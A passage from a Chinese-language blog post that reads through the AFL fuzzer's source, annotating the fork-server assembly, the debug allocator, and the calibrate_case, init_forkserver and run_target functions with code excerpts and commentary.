__afl_setup_abort\n"</span></span><br><span class="line">  <span class="string">"  /* Store the address of the SHM region. */\n"</span></span><br><span class="line">  <span class="string">"  movl %eax, __afl_area_ptr\n"</span></span><br><span class="line">  <span class="string">"  movl %eax, %edx\n"</span></span><br><span class="line">  <span class="string">"  popl %ecx\n"</span></span><br><span class="line">  <span class="string">"  popl %eax\n"</span></span><br><span class="line"></span><br><span class="line">  <span class="string">"__afl_forkserver:\n"</span></span><br><span class="line">  <span class="string">"  /* Enter the fork server mode to avoid the overhead of execve() calls. */\n"</span></span><br><span class="line">  <span class="string">"  pushl %eax\n"</span></span><br><span class="line">  <span class="string">"  pushl %ecx\n"</span></span><br><span class="line">  <span class="string">"  pushl %edx\n"</span></span><br><span class="line">  <span class="string">"  /* Phone home and tell the parent that we're OK. (Note that signals with\n"</span></span><br><span class="line">  <span class="string">"     no SA_RESTART will mess it up). If this fails, assume that the fd is\n"</span></span><br><span class="line">  <span class="string">"     closed because we were execve()d from an instrumented binary, or because\n"</span> </span><br><span class="line">  <span class="string">"     the parent doesn't want to use the fork server. */\n"</span></span><br><span class="line">  <span class="string">"  pushl $4          /* length    */\n"</span></span><br><span class="line">  <span class="string">"  pushl $__afl_temp /* data      */\n"</span></span><br><span class="line">  <span class="string">"  pushl $"</span> STRINGIFY((FORKSRV_FD + <span class="number">1</span>)) <span class="string">"  /* file desc */\n"</span><span class="comment">//fork server向fuzzer传递执行状态码，199描述符(后面会说是什么)</span></span><br><span class="line">  <span class="string">"  call  write\n"</span></span><br><span class="line">  <span class="string">"  addl  $12, %esp\n"</span></span><br><span class="line">  <span class="string">"  cmpl  $4, %eax\n"</span></span><br><span class="line">  <span class="string">"  jne   __afl_fork_resume\n"</span></span><br><span class="line"></span><br><span class="line">  <span class="string">"__afl_fork_wait_loop:\n"</span></span><br><span class="line">  <span class="string">"  /* Wait for parent by reading from the pipe. Abort if read fails. */\n"</span></span><br><span class="line">  <span class="string">"  pushl $4          /* length    */\n"</span></span><br><span class="line">  <span class="string">"  pushl $__afl_temp /* data      */\n"</span></span><br><span class="line">  <span class="string">"  pushl $"</span> STRINGIFY(FORKSRV_FD) <span class="string">"        /* file desc */\n"</span><span class="comment">//等待fuzzer传递命令，198描述符</span></span><br><span class="line">  <span class="string">"  call  read\n"</span></span><br><span class="line">  <span class="string">"  addl  $12, %esp\n"</span></span><br><span class="line">  <span class="string">"  cmpl  $4, %eax\n"</span></span><br><span class="line">  <span class="string">"  jne   __afl_die\n"</span></span><br><span class="line">  <span class="string">"  /* Once woken up, create a clone of our process. This is an excellent use"</span></span><br><span class="line">  <span class="string">"     case for syscall(__NR_clone, 0, CLONE_PARENT), but glibc boneheadedly"</span></span><br><span class="line">  <span class="string">"     caches getpid() results and offers no way to update the value, breaking"</span></span><br><span class="line">  <span class="string">"     abort(), raise(), and a bunch of other things :-( */\n"</span></span><br><span class="line">  <span class="string">"  call fork\n"</span></span><br><span class="line">  <span class="string">"  cmpl $0, %eax\n"</span></span><br><span class="line">  <span class="string">"  jl   __afl_die\n"</span></span><br><span class="line">  <span class="string">"  je   __afl_fork_resume\n"</span></span><br><span class="line">  <span class="string">"  /* In parent process: write PID to pipe, then wait for child. */\n"</span></span><br><span class="line">  <span class="string">"  movl  %eax, __afl_fork_pid\n"</span></span><br><span class="line">  <span class="string">"  pushl $4              /* length    */\n"</span></span><br><span class="line">  <span class="string">"  pushl $__afl_fork_pid /* data      */\n"</span></span><br><span class="line">  <span class="string">"  pushl $"</span> STRINGIFY((FORKSRV_FD + <span class="number">1</span>)) <span class="string">"      /* file desc */\n"</span><span class="comment">//199描述符</span></span><br><span class="line">  <span class="string">"  call  write\n"</span></span><br><span class="line">  <span class="string">"  addl  $12, %esp\n"</span></span><br><span class="line">  <span class="string">"  pushl $0             /* no flags  */\n"</span></span><br><span class="line">  <span class="string">"  pushl $__afl_temp    /* status    */\n"</span></span><br><span class="line">  <span class="string">"  pushl __afl_fork_pid /* PID       */\n"</span></span><br><span class="line">  <span class="string">"  call  waitpid\n"</span></span><br><span class="line">  <span class="string">"  addl  $12, %esp\n"</span></span><br><span class="line">  <span class="string">"  cmpl  $0, %eax\n"</span></span><br><span class="line">  <span class="string">"  jle   __afl_die\n"</span></span><br><span class="line">  <span class="string">"  /* Relay wait status to pipe, then loop back. */\n"</span> <span class="comment">//wait statu指最开始那个进程等待到的 子进程返回来的 状态</span></span><br><span class="line">  <span class="string">"  pushl $4          /* length    */\n"</span></span><br><span class="line">  <span class="string">"  pushl $__afl_temp /* data      */\n"</span></span><br><span class="line">  <span class="string">"  pushl $"</span> STRINGIFY((FORKSRV_FD + <span class="number">1</span>)) <span class="string">"  /* file desc */\n"</span></span><br><span class="line">  <span class="string">"  call  write\n"</span></span><br><span class="line">  <span class="string">"  addl  $12, %esp\n"</span></span><br><span class="line">  <span class="string">"  jmp __afl_fork_wait_loop\n"</span></span><br><span class="line">    </span><br><span class="line">  <span class="string">"__afl_fork_resume:\n"</span><span class="comment">//这里是每次forkserver fork出来的子进程都要执行的</span></span><br><span class="line">  <span class="string">"  /* In child process: close fds, resume execution. */\n"</span></span><br><span class="line">  <span class="string">"  pushl $"</span> STRINGIFY(FORKSRV_FD) <span class="string">"\n"</span></span><br><span class="line">  <span class="string">"  call  close\n"</span></span><br><span class="line">  <span class="string">"  pushl $"</span> STRINGIFY((FORKSRV_FD + <span class="number">1</span>)) <span class="string">"\n"</span></span><br><span class="line">  <span class="string">"  call  close\n"</span></span><br><span class="line">  <span class="string">"  addl  $8, %esp\n"</span></span><br><span class="line">  <span class="string">"  popl %edx\n"</span></span><br><span class="line">  <span class="string">"  popl %ecx\n"</span></span><br><span class="line">  <span class="string">"  popl %eax\n"</span></span><br><span class="line">  <span class="string">"  jmp  __afl_store\n"</span><span class="comment">//跳到前面的__afl_store</span></span><br><span class="line"></span><br><span class="line">  <span class="string">"__afl_die:\n"</span></span><br><span class="line">  <span class="string">"  xorl %eax, %eax\n"</span></span><br><span class="line">  <span class="string">"  call _exit\n"</span></span><br><span class="line">    </span><br><span class="line">  <span class="string">"__afl_setup_abort:\n"</span></span><br><span class="line">  <span class="string">"  /* Record setup failure so that we don't keep calling\n"</span></span><br><span class="line">  <span class="string">"     shmget() / shmat() over and over again. */\n"</span></span><br><span class="line">  <span class="string">"  incb __afl_setup_failure\n"</span></span><br><span class="line">  <span class="string">"  popl %ecx\n"</span></span><br><span class="line">  <span class="string">"  popl %eax\n"</span></span><br><span class="line">  <span class="string">"  jmp __afl_return\n"</span></span><br><span class="line">    </span><br><span class="line">  <span class="string">".AFL_VARS:\n"</span></span><br><span class="line">  <span class="string">"  .comm   __afl_area_ptr, 4, 32\n"</span></span><br><span class="line">  <span class="string">"  .comm   __afl_setup_failure, 1, 32\n"</span></span><br><span class="line">  <span class="string">"  .comm   __afl_prev_loc, 4, 32\n"</span></span><br><span class="line">  <span class="string">"  .comm   __afl_fork_pid, 4, 32\n"</span></span><br><span class="line">  <span class="string">"  .comm   __afl_temp, 4, 32\n"</span></span><br><span class="line">  <span class="string">"\n"</span></span><br><span class="line">  <span class="string">".AFL_SHM_ENV:\n"</span></span><br><span class="line">  <span class="string">"  .asciz \""</span> SHM_ENV_VAR <span class="string">"\"\n"</span></span><br><span class="line">  <span class="string">"\n"</span></span><br><span class="line">  <span class="string">"/* --- END --- */\n"</span></span><br></pre></td></tr></table></figure>

<img src="https://cdn.jsdelivr.net/gh/Coldshield/image_stored/image-20210203133736042.png" alt="image-20210203133736042" style="zoom:80%;">

<h2 id="alloc-inl-c"><a href="#alloc-inl-c" class="headerlink" title="alloc-inl.c"></a>alloc-inl.c</h2><p>后面的代码中很多与内存相关的操作都是alloc-inl里面的，不缕一下的话不知所云…所以这里记录一下经常在afl-fuzz.c中看到的几个内存操作函数</p>
<p>作者原话：This allocator is not designed to resist malicious attackers (the canaries are small and predictable), but provides a robust and portable way to detect use-after-free, off-by-one writes, stale pointers, and so on.</p>
<p>里面的宏定义有一些类似：<code>__LINE__</code>，<code>__FUNCTION__</code>的，这是C编译器的内置宏，具体代表什么意思百度一下即可</p>
<ul>
<li><code>ALLOC_CHECK_SIZE(size)</code> malloc前检查size是否超过设置的最大chunk大小</li>
<li><code>ret = malloc(size + ALLOC_OFF_TOTAL);</code>经常出现的malloc方式，这里是<code>+ ALLOC_OFF_TOTAL</code>为了在chunk前8字节处存放一个4B的头部标志和size，还有一个1B的尾部标志</li>
<li><code>ALLOC_CHECK_RESULT(ret,size)</code> malloc后检查是否分配成功，若ret为NULL，这个size就会用于打印错误信息</li>
<li><code>TRK_ck_strdup</code>，(<strong>TRK</strong>开头 + ck + 一般函数名)的函数，主要进行如下两个操作<ul>
<li><code>void* ret = DFL_ck_strdup(str);</code>，(<strong>DFL</strong>开头)的函数就是正常的操作，比如这个<code>DFL_ck_strdup</code>就是用作者自己的一些逻辑+上面提到的三个主要步骤实现</li>
<li><code>TRK_alloc_buf(void* ret, const char* file, const char* func, u32 line)</code> ，将哪个文件、哪个函数、哪一行申请内存的信息用 哈希散列+链地址法 的方法存在了一个散列表中，主要为了后续的检查。带alloc的函数用来存放，带free的就是用来判断有没有错误之类的</li>
</ul>
</li>
<li></li>
</ul>
<h2 id="afl-fuzz-c"><a href="#afl-fuzz-c" class="headerlink" title="afl-fuzz.c"></a>afl-fuzz.c</h2><p>看完了插桩接下来就是看具体的fuzz逻辑了，这里大概有8000多行代码，慢慢缕吧</p>
<p>main函数前面的主逻辑就是一个处理输入参数的逻辑，里面还处理了一个non official参数 <code>-B</code>…这里是作者的注释，作用是指定bitmap，会影响<code>in_bitmap</code>这个全局变量</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/* This is a secret undocumented option! It is useful if you find</span></span><br><span class="line"><span class="comment">an interesting test case during a normal fuzzing process, and want</span></span><br><span class="line"><span class="comment">to mutate it without rediscovering any of the test cases already</span></span><br><span class="line"><span class="comment">found during an earlier run.</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment">To use this mode, you need to point -B to the fuzz_bitmap produced</span></span><br><span class="line"><span class="comment">by an earlier run for the exact same binary... and that's it.</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment">I only used this once or twice to get variants of a particular</span></span><br><span class="line"><span class="comment">file, so I'm not making this an official setting. */</span></span><br></pre></td></tr></table></figure>

<p>处理完参数之后，首先 <code>setup_signal_handlers();check_asan_opts();</code>，设置一系列程序运行时的信号处理，比如超时如何处理，检查asan参数，然后还有一系列的设置和检查，具体还是看代码的7910行左右吧(2.52版本)</p>
<p>处理完参数之后就是一些操作</p>
<h3 id="main-part1"><a href="#main-part1" class="headerlink" title="main (part1)"></a>main (part1)</h3><p>因为函数属实有点多所以只记录了一些印象比较深的，建议想了解的话，每个函数点进去看看作者的注释说了什么，而且一些函数的作用在我前面开头提到的入门博客中有写，就不赘述了</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line">  save_cmdline(argc, argv);<span class="comment">//保存当前命令</span></span><br><span class="line">  fix_up_banner(argv[optind]);<span class="comment">//跟运行时的标志有关系，显示一个运行示例的名字之类的，可以用-T指定这个banner</span></span><br><span class="line">  check_if_tty();</span><br><span class="line">  get_core_count();</span><br><span class="line"><span class="meta">#<span class="meta-keyword">ifdef</span> HAVE_AFFINITY</span></span><br><span class="line">  bind_to_free_cpu();</span><br><span class="line"><span class="meta">#<span class="meta-keyword">endif</span> <span class="comment">/* HAVE_AFFINITY */</span></span></span><br><span class="line">  check_crash_handling();</span><br><span class="line">  check_cpu_governor();</span><br><span class="line">  setup_post();</span><br><span class="line">  setup_shm();<span class="comment">//这一步为bitmap初始共享内存，供fuzzer分析、目标文件进行记录</span></span><br><span class="line"><span class="comment">//还初始化了virgin_bits(如果使用-B就不会)，virgin_tmout，virgin_crash，内容均为0xFF</span></span><br><span class="line">  </span><br><span class="line">  init_count_class16();<span class="comment">//这里是为bitmap中的执行次数分类做准备</span></span><br><span class="line">  setup_dirs_fds();</span><br><span class="line">  read_testcases();</span><br><span class="line">  load_auto();</span><br><span class="line">  pivot_inputs();</span><br><span class="line">  <span class="keyword">if</span> (extras_dir) load_extras(extras_dir);</span><br><span class="line">  <span class="keyword">if</span> (!timeout_given) find_timeout();</span><br><span class="line">  detect_file_args(argv + optind + <span class="number">1</span>);</span><br><span class="line">  <span class="keyword">if</span> (!out_file) setup_stdio_file();</span><br><span class="line">  check_binary(argv[optind]);</span><br><span class="line">  start_time = get_cur_time();</span><br><span class="line">  <span class="keyword">if</span> (qemu_mode)</span><br><span class="line">    use_argv = get_qemu_argv(argv[<span class="number">0</span>], argv + optind, argc - optind);</span><br><span class="line">  <span class="keyword">else</span></span><br><span class="line">    use_argv = argv + optind;</span><br><span class="line"></span><br><span class="line">  perform_dry_run(use_argv);<span class="comment">//这个函数可以看看，主要是初始化forkserver后用我们提供的testcase进行初始测试，然后输出测试用例的一些结果信息</span></span><br><span class="line"><span class="comment">//里面子函数有很多关于fuzz细节相关的代码，建议研读</span></span><br></pre></td></tr></table></figure>

<h3 id="calibrate-case"><a href="#calibrate-case" class="headerlink" title="calibrate_case"></a>calibrate_case</h3><p><code>perform_dry_run</code>中主要就是这个函数用我们给的所有testcase对进行循环测试，<code>calibrate_case</code>第一次先调用<code>init_forkserver</code>将结构初始化（函数见下文），然后根据临时变量<code>stage</code>指定的次数，使用<code>run_target</code>进行循环测试(函数见下文)，而且每次执行完都进行了一次<code>update_bitmap_score</code>(这个函数用于找到更快或者规模更小的用例来达到相同的效果)，这里是循环体内的一部分代码</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line">u32 cksum;<span class="comment">//这个变量在后面的hash会用到</span></span><br><span class="line">   <span class="keyword">if</span> (!first_run &amp;&amp; !(stage_cur % stats_update_freq)) show_stats();<span class="comment">//这个是输出界面</span></span><br><span class="line">write_to_testcase(use_mem, q-&gt;len);<span class="comment">//输入测试用例的数据到一个临时文件，当做被测试文件的输入</span></span><br><span class="line"></span><br><span class="line">   fault = run_target(argv, use_tmout);<span class="comment">//fault是目标测试返回的错误类型</span></span><br><span class="line"></span><br><span class="line">   <span class="comment">/* stop_soon is set by the handler for Ctrl+C. When it's pressed,</span></span><br><span class="line"><span class="comment">          we want to bail out quickly. */</span></span><br><span class="line">   <span class="keyword">if</span> (stop_soon || fault != crash_mode) <span class="keyword">goto</span> abort_calibration;<span class="comment">//如果不是crash(只记录crash的crash模式)</span></span><br><span class="line"></span><br><span class="line">   cksum = hash32(trace_bits, MAP_SIZE, HASH_CONST);<span class="comment">//对执行的trace bitmap做一次hash</span></span><br><span class="line"></span><br><span class="line">   <span class="keyword">if</span> (q-&gt;exec_cksum != cksum)<span class="comment">//如果hash值发生变化，检测变化</span></span><br><span class="line">   &#123;</span><br><span class="line">         u8 hnb = has_new_bits(virgin_bits);<span class="comment">//always 0，return 1 hit-count for a particular tuple，2 if new tuples(二元组是干什么的见官方文档吧，相当于执行路径，用bitmap记录的)</span></span><br><span class="line">         <span class="keyword">if</span> (hnb &gt; new_bits) new_bits = hnb;</span><br><span class="line">         <span class="keyword">if</span> (q-&gt;exec_cksum)<span class="comment">//如果已经run过</span></span><br><span class="line">         &#123;</span><br><span class="line">               u32 i;</span><br><span class="line">               <span class="keyword">for</span> (i = <span class="number">0</span>; i &lt; MAP_SIZE; i++) </span><br><span class="line">               &#123;</span><br><span class="line">                     <span class="keyword">if</span> (!var_bytes[i] &amp;&amp; first_trace[i] != trace_bits[i])<span class="comment">//用var_bytes记录执行变化了的位置</span></span><br><span class="line">                     &#123;</span><br><span class="line">                       var_bytes[i] = <span class="number">1</span>;</span><br><span class="line">                       stage_max = CAL_CYCLES_LONG;</span><br><span class="line">                     &#125;</span><br><span class="line">               &#125;</span><br><span class="line">               var_detected = <span class="number">1</span>;</span><br><span class="line">         &#125; </span><br><span class="line">         <span class="keyword">else</span> </span><br><span class="line">         &#123;</span><br><span class="line">               q-&gt;exec_cksum = cksum;</span><br><span class="line">               <span class="built_in">memcpy</span>(first_trace, trace_bits, MAP_SIZE);</span><br><span class="line">         &#125;</span><br><span class="line">   &#125;</span><br></pre></td></tr></table></figure>

<p>循环体之后的代码，这里就针对<code>perform_dry_run</code>中单个测试用例的全部变化了，q就代表一个测试用例的结构体：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br></pre></td><td class="code"><pre><span class="line">  stop_us = get_cur_time_us();</span><br><span class="line">  total_cal_us     += stop_us - start_us;<span class="comment">//统计时间用</span></span><br><span class="line">  total_cal_cycles += stage_max;</span><br><span class="line">  <span class="comment">/* OK, let's collect some stats about the performance of this test case.</span></span><br><span class="line"><span class="comment">     This is used for fuzzing air time calculations in calculate_score(). */</span></span><br><span class="line">  q-&gt;exec_us     = (stop_us - start_us) / stage_max;<span class="comment">//每次执行的平均时间</span></span><br><span class="line">  q-&gt;bitmap_size = count_bytes(trace_bits);<span class="comment">//记录路径二元组的组数</span></span><br><span class="line">  q-&gt;handicap    = handicap;</span><br><span class="line">  q-&gt;cal_failed  = <span class="number">0</span>;</span><br><span class="line"></span><br><span class="line">  total_bitmap_size += q-&gt;bitmap_size;</span><br><span class="line">  total_bitmap_entries++;</span><br><span class="line"></span><br><span class="line">  update_bitmap_score(q);<span class="comment">//更新top_rated结构体</span></span><br><span class="line">	<span class="comment">//里面有一个minimize_bits函数，意思是设置一个只有0,1表示的是否有路径的minibitmap，相当于舍弃了原始bitmap的计数，只用一字节中的一位来表示</span></span><br><span class="line">  <span class="comment">/* If this case didn't result in new output from the instrumentation, tell</span></span><br><span class="line"><span class="comment">     parent. This is a non-critical problem, but something to warn the user</span></span><br><span class="line"><span class="comment">     about. */</span></span><br><span class="line">  <span class="keyword">if</span> (!dumb_mode &amp;&amp; first_run &amp;&amp; !fault &amp;&amp; !new_bits) fault = FAULT_NOBITS;</span><br><span class="line"></span><br><span class="line">abort_calibration:</span><br><span class="line">  <span class="keyword">if</span> (new_bits == <span class="number">2</span> &amp;&amp; !q-&gt;has_new_cov) </span><br><span class="line">  &#123;</span><br><span class="line">        q-&gt;has_new_cov = <span class="number">1</span>;<span class="comment">//循环执行过程中路径发生过变化</span></span><br><span class="line">        queued_with_cov++;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="comment">/* Mark variable paths. 在循环中如有某次的trace变化了，对该测试用例进行记录*/</span></span><br><span class="line">  <span class="keyword">if</span> (var_detected) </span><br><span class="line">  &#123;</span><br><span class="line">    	var_byte_count = count_bytes(var_bytes);</span><br><span class="line">    	<span class="keyword">if</span> (!q-&gt;var_behavior) </span><br><span class="line">        &#123;</span><br><span class="line">          mark_as_variable(q);</span><br><span class="line">          queued_variable++;</span><br><span class="line">        &#125;</span><br><span class="line">  &#125;</span><br><span class="line">  stage_name = old_sn;</span><br><span class="line">  stage_cur  = old_sc;</span><br><span class="line">  stage_max  = old_sm;</span><br><span class="line">  <span class="keyword">if</span> (!first_run) show_stats();</span><br><span class="line">  <span class="keyword">return</span> fault;</span><br></pre></td></tr></table></figure>



<h3 id="init-forkserver"><a href="#init-forkserver" class="headerlink" title="init_forkserver"></a>init_forkserver</h3><p><code>calibrate_case</code>中的函数，<code>init_forkserver</code>的代码不难懂建议直接看，又因为比较长这里就不写太多了，主要就是打开了两个pipe（一个用于forkserver发送状态、一个用于fuzzer发送命令，管道描述符分别设置值为198和199，对应之前的<code>afl_maybe_log</code>）之后fork出一个fuzzer子进程并setsid，把子进程的stdout、stderr全关、做了一些设置之后用execv替换成目标文件的进程映象，正式成为供fuzzer控制的forkserver。对于这个结构师傅们给出了图，对应的操作点一边是前面的afl-as.h分析中可以看到，还有一边在fuzzer中的run_target函数(下文分析)</p>
<img src="https://cdn.jsdelivr.net/gh/Coldshield/image_stored/image-20210203145002.png" alt="image-20210203145001" style="zoom:80%;">

<img src="https://cdn.jsdelivr.net/gh/Coldshield/image_stored/image-20210203145001.png" alt="QQ图片20210203145001" style="zoom:80%;">

<h3 id="run-target"><a href="#run-target" class="headerlink" title="run_target"></a>run_target</h3><p>这里截取了forkserver模式的部分代码用注释的方法分析</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/* Execute target application, monitoring for timeouts. Return status</span></span><br><span class="line"><span class="comment">   information. The called program will update trace_bits[]. */</span></span><br><span class="line"><span class="function"><span class="keyword">static</span> u8 <span class="title">run_target</span><span class="params">(<span class="keyword">char</span>** argv, u32 timeout)</span> </span>&#123;</span><br><span class="line">  <span class="keyword">static</span> <span class="class"><span class="keyword">struct</span> <span class="title">itimerval</span> <span class="title">it</span>;</span><span class="comment">//设置判断超时用</span></span><br><span class="line">  <span class="keyword">static</span> u32 prev_timed_out = <span class="number">0</span>;</span><br><span class="line">  <span class="keyword">int</span> status = <span class="number">0</span>;</span><br><span class="line">  u32 tb4;</span><br><span class="line">  child_timed_out = <span class="number">0</span>;</span><br><span class="line"></span><br><span class="line">  <span class="comment">/* After this memset, trace_bits[] are effectively volatile, so we</span></span><br><span class="line"><span class="comment">     must prevent any earlier operations from venturing into that</span></span><br><span class="line"><span class="comment">     territory. */</span></span><br><span class="line">  <span class="built_in">memset</span>(trace_bits, <span class="number">0</span>, MAP_SIZE);<span class="comment">//每次runtarget都会将bitmap置零</span></span><br><span class="line">  MEM_BARRIER();<span class="comment">//保护内存用</span></span><br><span class="line">    </span><br><span class="line">    s32 res;</span><br><span class="line">    <span class="comment">/* In non-dumb mode, we have the fork server up and running, so simply</span></span><br><span class="line"><span class="comment">       tell it to have at it, and then read back PID. */</span></span><br><span class="line">    </span><br><span class="line">    <span class="comment">//下文的write和read是发送命令接收状态的具体位置</span></span><br><span class="line">    <span class="keyword">if</span> ((res = <span class="built_in">write</span>(fsrv_ctl_fd, &amp;prev_timed_out, <span class="number">4</span>)) != <span class="number">4</span>) <span class="comment">//4B trigger forkserver，这里对应前面的hello message，正式启动,prev_time_out在这里是啥东西应该无所谓</span></span><br><span class="line">    &#123;</span><br><span class="line">      <span class="keyword">if</span> (stop_soon) <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">      RPFATAL(res, <span class="string">"Unable to request new process from fork server (OOM?)"</span>);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> ((res = <span class="built_in">read</span>(fsrv_st_fd, &amp;child_pid, <span class="number">4</span>)) != <span class="number">4</span>) <span class="comment">//get the child's PID by the fork of forkserver</span></span><br><span class="line">    &#123;</span><br><span class="line">      <span class="keyword">if</span> (stop_soon) <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">      RPFATAL(res, <span class="string">"Unable to request new process from fork server (OOM?)"</span>);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (child_pid &lt;= <span class="number">0</span>) FATAL(<span class="string">"Fork server is misbehaving (OOM?)"</span>);</span><br><span class="line"></span><br><span class="line">  <span class="comment">/* Configure timeout, as requested by user, then wait for child to terminate. */</span></span><br><span class="line">  it.it_value.tv_sec = (timeout / <span class="number">1000</span>);</span><br><span class="line">  it.it_value.tv_usec = (timeout % <span class="number">1000</span>) * <span class="number">1000</span>;</span><br><span class="line">  setitimer(ITIMER_REAL, &amp;it, <span class="literal">NULL</span>);</span><br><span class="line"></span><br><span class="line">  <span class="comment">/* The SIGALRM handler simply kills the child_pid and sets child_timed_out. */</span></span><br><span class="line">    s32 res;</span><br><span class="line">    <span class="keyword">if</span> ((res = <span class="built_in">read</span>(fsrv_st_fd, &amp;status, <span class="number">4</span>)) != <span class="number">4</span>)<span class="comment">//这里调用read应该会阻塞，因为这个statu得等子进程退出或者出错啥的</span></span><br><span class="line">     <span class="comment">//此时forkserver还在waitpid，forkserver一旦接收到子进程的信号量就发statu到fuzzer这里</span></span><br><span class="line">    &#123;</span><br><span class="line">      <span class="keyword">if</span> (stop_soon) <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">      RPFATAL(res, <span class="string">"Unable to communicate with fork server (OOM?)"</span>);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">  <span class="keyword">if</span> (!WIFSTOPPED(status)) child_pid = <span class="number">0</span>;<span class="comment">//已经停止了就将child_pid置零，防止在执行这几行代码时记录成time_out</span></span><br><span class="line">  it.it_value.tv_sec = <span class="number">0</span>;</span><br><span class="line">  it.it_value.tv_usec = <span class="number">0</span>;</span><br><span class="line">  setitimer(ITIMER_REAL, &amp;it, <span class="literal">NULL</span>);<span class="comment">//这里都是0的话就是取消计时器</span></span><br><span class="line"></span><br><span class="line">  total_execs++;</span><br><span class="line"></span><br><span class="line">  <span class="comment">/* Any subsequent operations on trace_bits must not be moved by the</span></span><br><span class="line"><span class="comment">     compiler below this point. Past this location, trace_bits[] behave</span></span><br><span class="line"><span class="comment">     very normally and do not have to be treated as volatile. */</span></span><br><span class="line">  MEM_BARRIER();</span><br><span class="line"></span><br><span class="line">  tb4 = *(u32*)trace_bits;</span><br><span class="line"></span><br><span class="line">  classify_counts((u32*)trace_bits);<span class="comment">//对trace_bits中的次数进行分类、重写</span></span><br><span class="line">    <span class="comment">//这里比较重要，第一次分析的时候没注意在run_target分类之后bitmap中每个字节只有9种状态，在前面calibrate_case里面有一个has_new_bits一直没看懂细节</span></span><br><span 